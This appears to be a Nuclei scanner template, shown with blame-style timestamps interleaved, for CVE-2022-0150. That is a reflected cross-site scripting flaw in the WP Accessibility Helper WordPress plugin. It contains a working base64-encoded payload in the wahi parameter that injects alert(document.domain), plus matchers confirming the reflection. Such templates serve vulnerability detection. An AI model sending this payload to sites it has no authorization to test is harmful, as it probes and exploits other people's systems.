2022-08-06 16:54:58 +00:00
id : CVE-2022-0150
2022-02-19 11:13:05 +00:00
info :
2022-08-10 08:36:51 +00:00
name : WP Accessibility Helper (WAH) < 0.6.0.7 - Cross-Site Scripting (XSS)
2022-02-19 11:13:05 +00:00
author : dhiyaneshDK
severity : medium
2022-08-10 08:36:51 +00:00
description : |
The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
2022-04-22 10:38:41 +00:00
reference :
- https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
2022-08-10 08:36:51 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0150
2022-08-25 08:56:24 +00:00
- https://plugins.trac.wordpress.org/changeset/2661008
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-0150
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : wordpress,wp-plugin,wp,wpscan,cve,cve2022,xss
2022-02-19 11:13:05 +00:00
requests :
- method : GET
path :
2022-02-22 07:50:05 +00:00
- '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
2022-02-19 11:13:05 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-02-22 07:50:05 +00:00
- "var wah_target_src = '';alert(document.domain);//';"
2022-02-19 11:13:05 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200